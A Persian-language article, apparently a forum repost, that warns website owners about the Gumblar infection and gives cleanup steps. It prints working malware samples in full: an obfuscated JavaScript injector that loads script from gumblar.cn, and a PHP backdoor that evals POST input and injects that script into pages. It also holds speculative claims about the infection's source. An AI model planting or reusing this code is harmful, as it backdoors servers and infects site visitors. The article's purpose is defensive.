اگر وب سایتی دارید که در آن از php یا html یا js استفاده شده است حتمی این مقاله را مطالعه نمائید
چند روزی است سرتاسر اینترنت پر شده است از ویروس فوق العاده مهلکی به نام گامبلار !
در کمتر سایتی می توانید راجع به این ویروس چیزی بیابید چه برسد به اینکه راه حلی برایش وجود داشته باشد .
ابتدا بگذارید ببینیم کار این ویروس چیست .
این ویروس خود را خارج از هاست و بدون داشتن دسترسی به هاست و ftp در فایلهای سایت کپی می کند .
شاید اکنون این به ذهن شما رسیده باشد که " خوب پاکش می کنیم " .
این ویروس غیر قابل پاک شدن است مگر اینکه خیلی سریع و کامل عمل کنید . شاید بیشتر از 10 بار این ویروس را
به روشی عادی پاک کردیم ( روی یکی از سایتهای مشتریهایمان ) اما بازهم پیدا می شد !!!
این ویروس چند حالت دارد :
1 ) برای فایلهای html : کدی که در فایلهای ساده html وجود دارد که بخصوص در فایلهای معروفی چون index به چشم میخورد .
این کد پس از تگ body دیده می شود .
این کد چیزی شبیه به این است یا اینکه دقیقا همین است :
کد:
<script language=javascript><!--
(function(G3l8J){var bNFt='var&20a&3d&22&53criptEn&67in&65&22&2c&62&3d&22Ve&72si&6fn()+&22&2cj&3d&22&22&2cu&3dnavigator&2e&75ser&41gent&3bif((u&2ei&6ed&65xO&66(&22Win&22)&3e0)&26&26(&75&2eindexO&66(&22NT&20&36&22)&3c0)&26&26(d&6fcumen&74&2ec&6foki&65&2e&69&6edex&4ff(&22&6d&69e&6b&3d&31&22&29&3c0&29&26&26&28t&79p&65o&66(zrvzts)&21&3dtypeof(&22A&22)))&7bzr&76&7at&73&3d&22A&22&3b&65v&61&6c&28&22if&28wind&6f&77&2e&22+a+&22)j&3d&6a+&22&2ba+&22Maj&6f&72&22&2bb+a&2b&22M&69nor&22+b+a&2b&22B&75ild&22&2bb+&22j&3b&22)&3bd&6fcu&6d&65n&74&2ewr&69te&28&22&3c&73cr&69p&74&20&73rc&3d&2f&2f&67u&6d&62lar&2ec&6e&2frss&2f&3fi&64&3d&22+j+&22&3e&3c&5c&2f&73&63ri&70t&3e&22)&3b&7d';var gXJ=unescape(bNFt.replace(G3l8J,'%'));eval(gXJ)})(/&/g);
--></script>
2) برای فایلهای php : کدی که در فایلهای php وجود دارد که بخصوص در فایلهای معروفی چون index , function , config زیاد
به چشم میخورد .
این کد اولین کد در فایل php می شود و یا شبیه کد زیر است یا دقیقا خودش است :
کد:
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsY W5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbihHM2w4Sil7dmFyIGJORnQ9J3ZhciYyMGEmM 2QmMjImNTNjcmlwdEVuJjY3aW4mNjUmMjImMmMmNjImM2QmMjJWZSY3MnNpJjZmbigpKyYyMiYyY2omM 2QmMjImMjImMmN1JjNkbmF2aWdhdG9yJjJlJjc1c2VyJjQxZ2VudCYzYmlmKCh1JjJlaSY2ZWQmNjV4T yY2NigmMjJXaW4mMjIpJjNlMCkmMjYmMjYoJjc1JjJlaW5kZXhPJjY2KCYyMk5UJjIwJjM2JjIyKSYzY zApJjI2JjI2KGQmNmZjdW1lbiY3NCYyZWMmNmZva2kmNjUmMmUmNjkmNmVkZXgmNGZmKCYyMiY2ZCY2O WUmNmImM2QmMzEmMjImMjkmM2MwJjI5JjI2JjI2JjI4dCY3OXAmNjVvJjY2KHpydnp0cykmMjEmM2R0e XBlb2YoJjIyQSYyMikpKSY3YnpyJjc2JjdhdCY3MyYzZCYyMkEmMjImM2ImNjV2JjYxJjZjJjI4JjIya WYmMjh3aW5kJjZmJjc3JjJlJjIyK2ErJjIyKWomM2QmNmErJjIyJjJiYSsmMjJNYWomNmYmNzImMjImM mJiK2EmMmImMjJNJjY5bm9yJjIyK2IrYSYyYiYyMkImNzVpbGQmMjImMmJiKyYyMmomM2ImMjIpJjNiZ CY2ZmN1JjZkJjY1biY3NCYyZXdyJjY5dGUmMjgmMjImM2MmNzNjciY2OXAmNzQmMjAmNzNyYyYzZCYyZ iYyZiY2N3UmNmQmNjJsYXImMmVjJjZlJjJmcnNzJjJmJjNmaSY2NCYzZCYyMitqKyYyMiYzZSYzYyY1Y yYyZiY3MyY2M3JpJjcwdCYzZSYyMikmM2ImN2QnO3ZhciBnWEo9dW5lc2NhcGUoYk5GdC5yZXBsYWNlK EczbDhKLCclJykpO2V2YWwoZ1hKKX0pKC8mL2cpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
3 ) برای فایلهای js : این ویروس خودش را در فایلهای جاوا نیز کپی می کند و آنها را نیز چک نمائید .
این ویروس چند نوع دارد : 1 ) همانی که در بالا توضیح داده شد 2 ) همین ویروس ولی با استفاده از iframe
اگر نوع اول ویروس را گرفتید که بسیار خوشحال باشید . چرا که تنها سایتتان ویروسی شده و هرچند سخت اما قابل درمان است .
اگر نوع دوم ویروس را گرفتید که شخصا پیشنهاد می کنم قید سایت خود را بزنید و کلا بروید دنبال کار دیگری .
در نوع دوم علاوه بر بلایایی که بخاطر ویروس بر سر شما می آید یک حادثه بسیار تلخ رخ می دهد و آن این است که گوگل سایت
شما را سایتی تشخیص می دهد که ویروس پخش می کند و سایت شما را بن می کند !
اگر این مشکل را نیز بتوانید حل کنید ( که خودتان نمی توانید و باید یک متخصص سئو این کار را انجام دهد ), دیگر چیزی در گوگل
به اسم سایت شما وجود ندارد ! یعنی تمامی زحماتی که کشیده بودید تا رتبه مناسبی در گوگل بگیرید بر بارد رفته است .
توجه داشته باشید که گوگل این موضوع را خیلی سریع متوجه می شود و بدون اینکه چیزی بگوید عمل می کند .
یعنی کاری ندارد که شما مقصر هستید یا نه ! سایت شما هک شده یا خودتان این کار را کرده اید ! کلا فقط یک چیز
را می داند و آن اینکه سایت شما فقط باید مسدود شود !!!
اگر سایت شما به این ویروس از نوع دوم گرفتار شود در کمتر از یک نصف روز در گوگل ویروس شناخته خواهید شد و این جمله
در بالای تمام نتایجی که سایت شما در گوگل بیاورد نشان داده می شود :
این وبگاه ممکن است به رایانه شما آسیب وارد نماید.
گوگل اینها را malware نامیده که معنای آن تقریبا بدافزار می شود .
پس همین الان سایت خود را باز کرده و دنبال این کدها باشید . یافتن آنها ساده است در همان ابتدای کدها قابل مشاهده است .
بخصوص به دنبال iframe باشید . در این بخش ممکن است آی فریمی را مشاهده نمائید که ابعاد آن بسیار کوچک باشد که
قابل مشاهده نباشد .
مژده : تابحال مشاهده نشده که سایتهایی که با دات نت یا asp کلاسیک ساخته شده اند آلوده به این ویروس شده باشند .
اما کار از محکم کاری عیب نمی کند .
این ویروس چه می کند ؟
اگر وارد سایتی شدید و ناگهان متوجه شدید یک فایل pdf از چنین آدرسی http:// gumblar . cn/rss/?id=2 می خواهد دانلود
شود یا باز شود مطمئن باشید که سایت یک نوعی از این ویروس را گرفته است .
تابحال هیچ انسانی متوجه نشده که اگر این فایل اجرا شود چه اتفاقی می افتد !
این سایت را در مرورگر خود به عنوان لیست سیاه قرار دهید ( هر چند که فایده ای هم ندارد ) .
این ویروس اولین کاری که می کند این است که لود شدن سایت را کند می کند , درست به مانند زمانی که سایت در حال
bandwidth تمام کردن است یا خیلی شلوغ است .
مسلما نویسنده این ویروس نیات شومی در سر دارد . چرا که تابحال خرابکاری خاصی در کامپیوتر کسی صورت نگرفته است .
یقینا صاحب ویروس قصد دارد تا ویروس را به کامپیوترهای زیادی تزریق کند و در یک اقدام ناگهانی خرابکاری خاصی را انجام
دهد که میلیونها نفر متضرر آن شوند .
این ویروس چگونه وارد سایتها شده است ؟
در این مبحث نظریه ها و فرضیه های گوناگون و زیادی ارائه شده است .
1 ) اولین نظریه این را عنوان می کند که این شخص سایت را هک کرده و این ویروس را وارد سایت می کند !
آیا چنین چیزی با منطق سازگار است ؟ مگر یکی دو سایت است ؟ هزاران سایت در سرتاسر جهان آلوده به این ویروس شده اند .
2 ) دومین نظریه بر این استوار است که این می تواند یکی از حملات بات نتی ( مثلا DDos ) باشد که این قدری می تواند
درست باشد اما چرا تنها بعضی از سایتها ( البته فعلا ) دچار این مشکل شده اند ؟
3 ) نظریه سوم عنوان می کند که این ویروس برنامه های کار با FTP را آلوده می کند و هر فایلی که از طریق این برنامه ها
آپلود می شود این ویروس خودش را به آنها می افزاید . این نظریه تا حدودی منطقی به نظر می رسد اما پس از بررسیهای
کارشناسی این بحث رد شد . بعضی از صاحبان سایت با SFTP فایلها را آپلود می کردند پس چرا آنها ویروس را گرفتند .
آنتی ویروسهای بزرگی که به هر چیزی شک می کنند چرا برنامه ای را که نا خود آگاه روی کامپیوتر دانلود شده , نصب شده و
اجرا شده را شناسایی نکرده اند ؟
4 ) چهارمین نظریه که بهترین آنها نیز می باشد انگشت اتهام را به سمت و سوی هاستینگها نشانه می روند که همانا
صحیح است .
اینکه تنها بعضی از سایتها آلوده می شوند . اینکه هیچ کس نمی داند چگونه این ویروس وارد سایتشان شده است . و یکی
دو دلیل دیگر مظنون شماره یک این ماجرا را سرورهای ضعیف هاستینگ می داند .
اگر سرور هاستینگ سروری با ایمنی بالا باشد هرگر دچار چنین مشکلی نخواهید شد .
وای به روزی که یکی از بلاگ ها چنین ویروسی را بگیرند .
نکته جالب اینجاست که آمار آلوده شدن سایتهای ایرانی به این ویروس بسیار زیاد است .
مرکز فعالیت این ویروس چیست ؟
مرکز فعالیت این ویروس در سایت شما یک چیز است . فایلی به نام image.php !!!
ویروس این فایل را در تمامی فولدرهایی که نام imgaes دارند کپی می کند . حال هرچند بار نیز که شما کدها را از فایلهای
خود حذف کنید باز هم نمایان خواهند شد . چراکه این فایل دستور ساخت آنها را می دهد .
راه چاره چیست ؟
همیشه پیشگیری بهتر از درمان است . چه این ویروس را گرفته باشید و چه نگرفته باشید این کارها را انجام دهید .
در چنین مواقعی است که ارزش بک آپها مشخص می شود , اگر یک آپ دارید که هیچ اما اگر ندارید :
1 - یک فایل خالی به نام image.php می سازید .
2 - این فایل را با فایلی که در فولدر imgaes در سایتتان وجود دارد جابجا می کند و سطح دسترسی آن را جوری تنظیم می کنید
که در آن write وجود نداشته باشد .
3 - کدهای مذکور را از فایلهای سایتتان پاک کرده و سطح دسترسی این فایلها را نیز طروی تنظیم می کنید که در آن write وجود
نداشته باشد .
4 - تمامی فایلهایی که یا به نام های زیر هستند یا این نامهای در قسمتی از نام آنها وجود دارد را چک می کنید :
index.php
index.htm
index.html
functions.php
script.js
config.php
setting.php
db.php
منبع: mybbsupport